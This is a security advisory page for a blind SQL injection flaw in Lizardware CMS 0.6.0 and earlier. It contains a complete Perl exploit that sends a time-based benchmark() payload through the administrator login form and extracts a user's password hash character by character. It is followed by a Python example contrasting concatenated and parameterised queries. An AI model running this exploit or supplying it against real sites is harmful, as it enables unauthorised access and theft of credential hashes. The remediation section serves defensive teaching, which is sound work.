Lizardware CMS <= 0.6.0 Blind SQL Injection

2009.05.05
Credit: staker[
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w
# Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://sourceforge.net/projects/lizardwarecms/

use strict;
use LWP::UserAgent;

my ($stop,$start,$hash);
my $domain = shift;
my $ptable = shift;
my $userid = shift or &usage;
my @chars  = (48..57, 97..102);   # '0'..'9' and 'a'..'f': the hash is hexadecimal
my $substr = 1;                   # position of the hash character being tested
my $http   = new LWP::UserAgent;

&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/;

# POST the crafted value in the 'user' field of the administrator login form.
sub send_request {
    my $post  = undef;
    my $host  = $domain;
    my $param = shift @_ or die $!;
    $host .= "/administrator/index.php?loginsubmitMTIyOTU0ODExMg== ";
    $post = $http->post($host,[ user => $param, pass => 'anything' ]);
}

# Build the time-based condition: a matching character makes the
# server spend a long time in benchmark(), a miss returns at once.
sub give_char {
    my $send = undef;
    my ($charz,$uidz) = @_;
    $send = "' or (select if((ascii(substring".
            "(user_password,$uidz,1))=$charz),".
            "benchmark(230000000,char(0)),".
            "0) from ${ptable}_users where user_id=$userid)#";
    return $send;
}

# 32 characters of the hash; a response delayed by more than 6 s is a hit.
for(1..32) {
    foreach my $set(@chars) {
        my $start = time();
        send_request(give_char($set,$substr));
        my $stop = time();
        if($stop - $start > 6) {
            syswrite(STDOUT,chr($set));
            $substr++;
            last;
        }
    }
}

sub usage {
    print "[?] Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit\n";
    print "[?] by athos - staker[at]hotmail[dot]it\n";
    print "[?] Usage: perl \$0 http://[host/path] [table_prefix] [id]\n";
    exit;
}
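The flaw behind this advisory (CWE-89) is that the login form's `user` value is spliced into the SQL text, so the closing quote and the `or (select ...)` clause become part of the query and the response time becomes an oracle on `user_password`. The following is an added example, not code from the advisory or from Lizardware CMS: it uses Python's sqlite3 as a stand-in for the MySQL backend and a constructed `<prefix>_users` table (the `user_id` and `user_password` columns come from the payload above; `user_name`, the `lz` prefix and the sample rows are assumptions) to show the concatenated lookup beside its parameterised form.

```python
import re
import sqlite3
from typing import Optional, Tuple

# Hypothetical table prefix; the real value is an installation setting.
TABLE_PREFIX = "lz"

def valid_prefix(prefix: str) -> bool:
    """Identifiers cannot be bound as parameters, so a prefix taken from
    configuration must be validated before it is interpolated into SQL."""
    return re.fullmatch(r"[A-Za-z0-9_]+", prefix) is not None

def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the CMS users table (not the real schema)."""
    assert valid_prefix(TABLE_PREFIX)
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE {TABLE_PREFIX}_users "
        "(user_id INTEGER PRIMARY KEY, user_name TEXT, user_password TEXT)"
    )
    conn.executemany(
        f"INSERT INTO {TABLE_PREFIX}_users VALUES (?, ?, ?)",
        [
            (1, "admin", "5f4dcc3b5aa765d9"),    # constructed sample hash fragment
            (2, "o'brien", "d41d8cd98f00b204"),  # legitimate name containing a quote
        ],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user: str) -> Optional[Tuple]:
    """Query built by string concatenation: whatever the client sends in
    'user' is parsed as SQL, which is the pattern the advisory exploits."""
    sql = (f"SELECT user_id, user_name FROM {TABLE_PREFIX}_users "
           f"WHERE user_name = '{user}'")
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # A quote in an ordinary name already breaks the statement.
        return ("ERROR", str(exc))

def lookup_hardened(conn: sqlite3.Connection, user: str) -> Optional[Tuple]:
    """Same lookup with the value bound as a parameter: the driver sends the
    text as data, so a quote or an 'or' clause never changes the query shape."""
    sql = (f"SELECT user_id, user_name FROM {TABLE_PREFIX}_users "
           "WHERE user_name = ?")
    return conn.execute(sql, (user,)).fetchone()

if __name__ == "__main__":
    db = build_db()
    # Constructed input shaped like the advisory's value: closes the literal
    # and appends a condition that is always true.
    crafted = "x' or '1'='1"
    print("vulnerable:", lookup_vulnerable(db, crafted))   # returns the admin row
    print("hardened:  ", lookup_hardened(db, crafted))     # returns None
    print("vulnerable, legit name:", lookup_vulnerable(db, "o'brien"))
    print("hardened,   legit name:", lookup_hardened(db, "o'brien"))
```

The same binding removes the timing oracle: with the value bound, the `benchmark()` call in the advisory's payload is never evaluated because it is never SQL. Note that the table prefix still has to be interpolated (parameters cannot name identifiers), which is why it is whitelisted with `valid_prefix` rather than trusted blindly.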

References:

http://www.milw0rm.com/exploits/7507


Copyright 2024, cxsecurity.com